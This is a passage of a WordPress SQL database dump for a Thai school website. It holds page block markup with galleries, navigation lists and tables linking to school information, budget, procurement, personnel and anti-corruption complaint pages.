(661,1,'2024-08-07 21:32:40','2024-08-07 14:32:40','','ปขก','','inherit','','closed','','%e0%b8%9b%e0%b8%82%e0%b8%81','','','2024-08-07 21:32:40','2024-08-07 14:32:40','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png',0,'attachment','image/png',0),
(663,1,'2024-08-07 21:34:17','2024-08-07 14:34:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"thumbSize\":\"full\",\"ids\":[660,661],\"type\":\"slider\",\"imageRatio\":\"inherit\",\"imagesDynamic\":[{\"id\":660,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=660\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"width\":1500,\"height\":600},{\"id\":661,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=661\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"width\":1500,\"height\":600}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 